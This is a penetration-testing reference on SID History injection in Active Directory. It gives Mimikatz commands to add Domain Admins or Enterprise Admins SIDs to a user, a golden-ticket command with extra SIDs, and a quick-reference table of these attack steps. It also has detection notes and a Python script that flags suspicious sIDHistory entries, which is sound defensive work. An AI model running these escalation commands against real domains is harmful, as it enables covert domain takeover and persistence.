
Overview

The sIDHistory attribute stores a principal's previous SIDs from a domain migration. If an Enterprise Admins or Domain Admins SID is injected into it, the user transparently receives those privileges because the SIDs are added to the user's access token at logon.

Inject SID History — Mimikatz

mimikatz # privilege::debug
mimikatz # sid::patch
mimikatz # sid::add /sam:targetuser /new:S-1-5-21-DOMAIN-SID-500

Add Enterprise Admins SID

mimikatz # sid::add /sam:targetuser /new:S-1-5-21-PARENT-DOMAIN-SID-519

Via Golden Ticket

Include extra SIDs in golden ticket:
mimikatz # kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt
RID 519 = Enterprise Admins.

Check SID History

Get-ADUser targetuser -Properties SIDHistory | Select SIDHistory
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(sAMAccountName=targetuser)" sIDHistory

Cross-Domain Abuse

Inject parent domain’s Domain Admins SID into child domain user:
mimikatz # sid::add /sam:childuser /new:S-1-5-21-PARENT-SID-512
Child domain user now has Domain Admin rights in parent domain.

Notes

  • Survives password changes
  • Works across domain trusts (if SID filtering is not enabled)
  • Very stealthy — user appears normal
  • Detection: audit sIDHistory attribute changes
  • SID filtering blocks this across forest trusts
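A defender-side check to go with the Get-ADUser / ldapsearch commands above and the detection note. This is an added Python example, not code from the original page: it decodes the base64 binary SIDs that ldapsearch returns for sIDHistory, then flags any history entry that carries a well-known privileged RID (500/512/518/519) or that was issued by the local domain itself (legitimate migration history always comes from another domain). The domain SIDs and the LDIF dump are constructed sample data.

```python
import base64
import struct

# Well-known RIDs that should never appear in sIDHistory (any RID below 1000 is built-in).
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

def sid_bytes_to_str(raw):
    """Decode a binary SID (the form LDAP returns) into S-1-5-21-... text."""
    revision, sub_count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")            # 48-bit big-endian
    subs = struct.unpack_from("<%dI" % sub_count, raw, 8)  # little-endian uint32s
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))

def sid_str_to_bytes(sid):
    """Inverse of sid_bytes_to_str; used only to build the constructed sample below."""
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def parse_ldif(ldif):
    """Map each entry's dn -> decoded sIDHistory SIDs from ldapsearch output ('::' marks base64)."""
    entries, dn = {}, None
    for line in ldif.splitlines():
        if line.startswith("dn: "):
            dn = line[4:]
            entries[dn] = []
        elif line.startswith("sIDHistory:: "):
            entries[dn].append(sid_bytes_to_str(base64.b64decode(line[13:])))
    return entries

def find_suspicious(entries, own_domain_sid):
    """Flag history SIDs with a privileged RID, or issued by this very domain (never legitimate)."""
    findings = []
    for dn, sids in entries.items():
        for sid in sids:
            domain, rid = sid.rsplit("-", 1)
            if int(rid) in PRIVILEGED_RIDS:
                findings.append((dn, sid, "privileged RID: " + PRIVILEGED_RIDS[int(rid)]))
            elif domain == own_domain_sid:
                findings.append((dn, sid, "same-domain SID in history"))
    return findings

# Constructed sample (not real data): our domain SID, the SID of a domain users were migrated from,
# and an ldapsearch-style dump with one legitimate history entry and one injected one.
OWN_DOMAIN = "S-1-5-21-1004336348-1177238915-682003330"
OLD_DOMAIN = "S-1-5-21-2127521184-1604012920-1887927527"
_b64 = lambda sid: base64.b64encode(sid_str_to_bytes(sid)).decode()
SAMPLE_LDIF = (
    f"dn: CN=migrated,CN=Users,DC=domain,DC=local\nsIDHistory:: {_b64(OLD_DOMAIN + '-1105')}\n\n"
    f"dn: CN=targetuser,CN=Users,DC=domain,DC=local\nsIDHistory:: {_b64(OLD_DOMAIN + '-519')}\n"
    f"sIDHistory:: {_b64(OWN_DOMAIN + '-1106')}\n"
)
```

Run `find_suspicious(parse_ldif(SAMPLE_LDIF), OWN_DOMAIN)` to see the two findings for targetuser; in production feed it the output of the ldapsearch command above (with a base filter of `(sIDHistory=*)`) and your own domain SID.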

Quick Reference

Task                   Command
Inject SID             mimikatz # sid::add /sam:user /new:SID
Via Golden             /sids:S-1-5-21-PARENT-519 in golden ticket
Check                  Get-ADUser user -Properties SIDHistory
Enterprise Admin SID   -519 from parent domain